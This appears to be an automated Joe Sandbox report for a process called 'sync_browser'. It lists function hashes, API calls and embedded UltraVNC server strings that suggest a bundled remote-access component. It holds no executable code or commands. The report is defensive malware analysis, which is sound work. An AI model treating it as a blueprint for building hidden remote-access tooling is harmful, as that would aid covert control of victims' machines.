                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: freemalloc
                                                                    • String ID: vncencoder.cpp : failed to obtain colour map data!$vncencoder.cpp : generating 8-bit palette data$vncencoder.cpp : generating BGR233 palette data$vncencoder.cpp : remote palette data requested
                                                                    • API String ID: 3061335427-2748099863
                                                                    • Opcode ID: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
                                                                    • Instruction ID: d4f4c517779922dcace97ef9335b4abeca9e7a3ff85759280316a5ebea581b2f
                                                                    • Opcode Fuzzy Hash: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
                                                                    • Instruction Fuzzy Hash: 45412662A286AB85F7209B20E9017BD7764EF44744F440133EA4CC3A9ADF3DE567CB50
                                                                    Function 00007FF6DC0CC6A0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 105COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %s:%s$Enter proxy authentication password for %s@%s: $Proxy-Authorization: Basic %s
                                                                    • API String ID: 0-3750121419
                                                                    • Opcode ID: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
                                                                    • Instruction ID: 36eb15f68fe6e74ba931f2bf41ca7343a53ec2fcb5ab96deea7ff3b729556cf7
                                                                    • Opcode Fuzzy Hash: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
                                                                    • Instruction Fuzzy Hash: 6131F321B0868940EB10DB66A8501AD6794EF89BF4F540332EE3D87BD5EF3DD1A38340
                                                                    Function 00007FF6DC0D42A0 Relevance: 9.1, APIs: 6, Instructions: 101threadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Thread$CreateFileMessageModuleNamePlayPostResumeSound
                                                                    • String ID:
                                                                    • API String ID: 3945334538-0
                                                                    • Opcode ID: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
                                                                    • Instruction ID: c3bb8f1bb607d5597a243edffa692a121acc32a460b8695088c1ce3b1b601ad2
                                                                    • Opcode Fuzzy Hash: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
                                                                    • Instruction Fuzzy Hash: 9E41F326B1895581EB109F69E8402BD6361EFC8BA9F044132DF5D87B99DF3CD8A3C344
                                                                    Function 00007FF6DC17AA6C Relevance: 9.1, APIs: 6, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo$_fileno_ftbuf
                                                                    • String ID:
                                                                    • API String ID: 2434734397-0
                                                                    • Opcode ID: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
                                                                    • Instruction ID: d8365a295eedb4c812ace4c9786fc1537ba5758941189f5702d4a5e0d998fef4
                                                                    • Opcode Fuzzy Hash: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
                                                                    • Instruction Fuzzy Hash: 07312462E0C62E91EE54D7689D5027D628A6F45BA0F606633ED2DC72D1DF2CE86BD300
                                                                    Function 00007FF6DC0DFFA0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • malloc.LIBCMT ref: 00007FF6DC0DFFFD
                                                                      • Part of subcall function 00007FF6DC178C34: _FF_MSGBANNER.LIBCMT ref: 00007FF6DC178C64
                                                                      • Part of subcall function 00007FF6DC178C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF6DC18329C,?,?,?,00007FF6DC187749,?,?,?,00007FF6DC1877F3), ref: 00007FF6DC178C89
                                                                      • Part of subcall function 00007FF6DC178C34: _callnewh.LIBCMT ref: 00007FF6DC178CA2
                                                                      • Part of subcall function 00007FF6DC178C34: _errno.LIBCMT ref: 00007FF6DC178CAD
                                                                      • Part of subcall function 00007FF6DC178C34: _errno.LIBCMT ref: 00007FF6DC178CB8
                                                                    • free.LIBCMT ref: 00007FF6DC0E0097
                                                                      • Part of subcall function 00007FF6DC178BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF6DC17748C), ref: 00007FF6DC178C0A
                                                                      • Part of subcall function 00007FF6DC178BF4: _errno.LIBCMT ref: 00007FF6DC178C14
                                                                      • Part of subcall function 00007FF6DC178BF4: GetLastError.KERNEL32(?,?,?,00007FF6DC17748C), ref: 00007FF6DC178C1C
                                                                    • free.LIBCMT ref: 00007FF6DC0E00BF
                                                                    Strings
                                                                    • This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted., xrefs: 00007FF6DC0E0068
                                                                    • vncclient.cpp : no password specified for server - client rejected, xrefs: 00007FF6DC0E0053
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF6DC0DFFE0
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                    • String ID: This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted.$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$vncclient.cpp : no password specified for server - client rejected
                                                                    • API String ID: 1063416079-3080451256
                                                                    • Opcode ID: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
                                                                    • Instruction ID: 738d8c735f18537d93e199e2dcfa6f09c59d98523d5a4da3ae71dab0824e73aa
                                                                    • Opcode Fuzzy Hash: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
                                                                    • Instruction Fuzzy Hash: 6631B021B18A8A81EA40EB25E8542AE6354EF84BB4F544333E93EC76E5DF2DD4538310
                                                                    Function 00007FF6DC1837C4 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19,?,?,?,00007FF6DC17748C), ref: 00007FF6DC1837CE
                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19,?,?,?,00007FF6DC17748C), ref: 00007FF6DC1837DC
                                                                    • SetLastError.KERNEL32(?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19,?,?,?,00007FF6DC17748C), ref: 00007FF6DC183834
                                                                      • Part of subcall function 00007FF6DC1832EC: Sleep.KERNEL32(?,?,?,00007FF6DC1837F7,?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19), ref: 00007FF6DC183331
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF6DC17FFD1,?,?,?,?,00007FF6DC178C19,?,?,?,00007FF6DC17748C), ref: 00007FF6DC183808
                                                                    • free.LIBCMT ref: 00007FF6DC18382B
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00007FF6DC18381C
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                    • String ID:
                                                                    • API String ID: 3106088686-0
                                                                    • Opcode ID: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
                                                                    • Instruction ID: 36501c8398faebe4fb81042284b1aee6880fe34bc04d54293cc80475df9aea79
                                                                    • Opcode Fuzzy Hash: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
                                                                    • Instruction Fuzzy Hash: 43017124E0D75A82FE05AF65EC4453C6299AF48790F884236D92E823D1EE3CE437C610
                                                                    Function 00007FF6DC1799D8 Relevance: 9.0, APIs: 6, Instructions: 37COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_fileno_flush_freebuf_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3613856401-0
                                                                    • Opcode ID: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
                                                                    • Instruction ID: ef8ad4d83e9b08fe769bcc2efb2bac8f8b175a16ca96d5545d8c6b0cc5043129
                                                                    • Opcode Fuzzy Hash: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
                                                                    • Instruction Fuzzy Hash: 5C01A222E0D56A81FE54BA79CC1137C11585F95764F280332E92DC62D3DE3CE867A380
                                                                    Function 00007FF6DC0DDEB0 Relevance: 9.0, APIs: 6, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 2426525106-0
                                                                    • Opcode ID: 62c358e5ac2c98add2e1aca0b2aa750da30c38599e13f62c2cec2e3da3838843
                                                                    • Instruction ID: b39da4253336ed3d3e3ee7db38521287198c2b75a317ef6ec8b14b8b2da5be86
                                                                    • Opcode Fuzzy Hash: 62c358e5ac2c98add2e1aca0b2aa750da30c38599e13f62c2cec2e3da3838843
                                                                    • Instruction Fuzzy Hash: E101EC22A19A55D2EA44DB16ED5017C6328FF88B90F444132DA5D83BA1CF2DE877C340
                                                                    Function 00007FF6DC0D0310 Relevance: 9.0, APIs: 6, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 2426525106-0
                                                                    • Opcode ID: 9faadf5584e3ab048ad9f99b225c95f2b16b16b17d63f249fe3ec8bb2152293a
                                                                    • Instruction ID: 35f221bd5498b9a405dc907094e7d48bc9d7bcc7be3ea7c771300cbe47ebc10a
                                                                    • Opcode Fuzzy Hash: 9faadf5584e3ab048ad9f99b225c95f2b16b16b17d63f249fe3ec8bb2152293a
                                                                    • Instruction Fuzzy Hash: E201FF62A19A55D6EA44DB16ED9017C6328FF88B90F444133DA5DC3BA1CF2DE8B7C300
                                                                    Function 00007FF6DC0EB810 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 255fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • vncclient.cpp : Compress returned error in File Send :%d, xrefs: 00007FF6DC0EBA26
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$EnterFileRead
                                                                    • String ID: vncclient.cpp : Compress returned error in File Send :%d
                                                                    • API String ID: 3826087893-1161645139
                                                                    • Opcode ID: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
                                                                    • Instruction ID: 98b540e96a230d3e6d7935af974d952cf24d2ecbed849096db33d863faf5bdd9
                                                                    • Opcode Fuzzy Hash: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
                                                                    • Instruction Fuzzy Hash: 8AB1D032A08A5689E7648F25C8007BD37A5EB84B58F18013BDE5DCB7D9CF79E422C758
                                                                    Function 00007FF6DC1172F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: EnumDisplayDevicesA$USER32
                                                                    • API String ID: 145871493-2970514552
                                                                    • Opcode ID: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                                    • Instruction ID: 424f5d637997b9d646f6c5a498b5a9899285d4e69cd5e418ece9492925e070e7
                                                                    • Opcode Fuzzy Hash: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                                    • Instruction Fuzzy Hash: 4E31E931A18BDA85E760CB19E8446AD63A8FBA9B94F444336DE9D83784DF3CD413CB40
                                                                    Function 00007FF6DC1171D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: EnumDisplayDevicesA$USER32
                                                                    • API String ID: 145871493-2970514552
                                                                    • Opcode ID: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                                    • Instruction ID: fb87e65c0143aee3eae6d96953c91e877c957fd1cc3e5b7451ffc8d63562b04e
                                                                    • Opcode Fuzzy Hash: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
                                                                    • Instruction Fuzzy Hash: 67219332B08B5582E7649F15F8447AD63A8FBA8794F550236EEAD83784DF3CD4138B40
